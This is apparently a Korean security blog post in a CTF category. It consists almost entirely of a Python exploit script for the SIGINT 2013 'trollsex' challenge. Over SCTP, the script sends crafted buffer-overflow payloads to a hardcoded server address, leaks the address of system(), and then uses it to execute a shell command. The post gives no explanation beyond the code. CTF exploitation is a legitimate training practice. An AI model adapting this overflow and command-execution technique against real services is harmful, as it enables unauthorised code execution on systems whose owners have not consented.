본문 바로가기

Computer Security/CTF

[SIGINT 2013] trollsex(tr0llsex) exploit






import socket
import sctp
from struct import *
 
s = sctp.sctpsocket_tcp(socket.AF_INET)
s.connect(('188.40.147.118',1024))
#s.connect(('127.0.0.1',1024))
print s.recv(1024)
cmd = "system\x00"
s.sctp_send(cmd+"A"*(24-len(cmd))+pack('<Q',0x401120)+"EEEEEEEE"+"\n",stream=9)
get=s.recv(1024)
system=int(get[2:],16)
print "System: "+hex(system)
cmd = "id>&4\x00"
s.sctp_send(cmd+"A"*(24-len(cmd))+pack('<Q',system)+"EEEEEEEE"+"\n",stream=9)
get=s.recv(1024)
print get
 
s.close()


'Computer Security > CTF' 카테고리의 다른 글

[DIMVA 2013] pwn 200 exploit  (0) 2013.07.23
[DIMVA 2013] pwn 100 exploit  (0) 2013.07.23
[SIGINT 2013] mail exploit  (0) 2013.07.08
[SIGINT 2013] proxy exploit  (0) 2013.07.08
[defcon 2013] annyong exploit  (1) 2013.06.28